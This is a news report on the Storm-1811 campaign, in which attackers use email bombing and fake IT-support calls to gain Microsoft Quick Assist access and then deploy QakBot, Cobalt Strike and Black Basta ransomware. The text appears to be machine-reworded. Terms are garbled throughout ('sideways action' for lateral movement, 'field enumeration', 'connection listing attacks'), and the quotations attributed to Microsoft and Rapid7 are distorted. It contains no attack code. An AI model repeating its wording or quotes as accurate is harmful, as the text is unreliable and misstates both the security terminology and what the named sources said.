Cybercriminals Utilize Microsoft Quick Assist Feature in Ransomware Attacks

The Microsoft Threat Intelligence unit expressed it has marked a danger it tracks underneath the name Storm-1811 manipulating the customer managing tool Quick Assist to target users in social engineering attacks. "Storm-1811 is a financially motivated hacker group known to deploy Black Basta ransomware," the business stated in a statement issued on May 15, 2024.

The attack chain involves the usage of impersonation via voice phishing to fool trusting targets into establishing remote monitoring and managing (RMM) tools, observed by the delivery of QakBot, Cobalt Strike, and eventually Black Basta ransomware. "Bad actors misapply Quick Assist features to achieve social engineering attacks by acting, for example, to be a trusted reference like Microsoft specialized asset or an IT expert from the target user's enterprise to achieve initial entrance to a target device," the tech giant stated.

Quick Assist is a fair application from Microsoft that allows users to share their Windows or macOS device with another individual over a remote link, especially to troubleshoot technological problems on their systems. It comes installed by default on devices operating Windows 11. To make the attacks more effective, the threat actors found connection listing attacks, a variety of email bombing attacks in which the targeted email addresses are marked up for different honest email subscription services to attack their inboxes with subscribed range.

The opponent then masquerades as the company's IT help team via phone calls to the target user, purporting to deliver service in remediating the spam problem and giving them a pass to their device through Quick Assist. "Once the user permits access and management, the danger actor runs a scripted cURL order to download a sequence of collection files or ZIP files utilized to deliver malicious payloads," the Windows designer declared.

"Storm-1811 leverages their access and serves further hands-on-keyboard movements such as field enumeration and sideways action. Storm-1811 then utilizes PsExec to deploy Black Basta ransomware throughout the network." Microsoft said it's keeping a tight eye on the abuse of Quick Assist in these attacks and that it's operating on incorporating alert news in the software to inform users of potential tech support frauds that could reduce ransomware delivery.

The campaign, acknowledged to have started in mid-April 2024, has targeted a sort of enterprises and verticals, including manufacturing, building, meals & beverage, and conveyance, Rapid7 displayed, showing the opportunistic character of the attacks. "The inferior border of entry into performing these attacks, associated with the important effects these attacks have on their targets, resume to make ransomware an extremely useful point to an end for threat actors pursuing a payday," Robert Knapp, senior manager of incident reaction services at Rapid7, said in a report transmitted.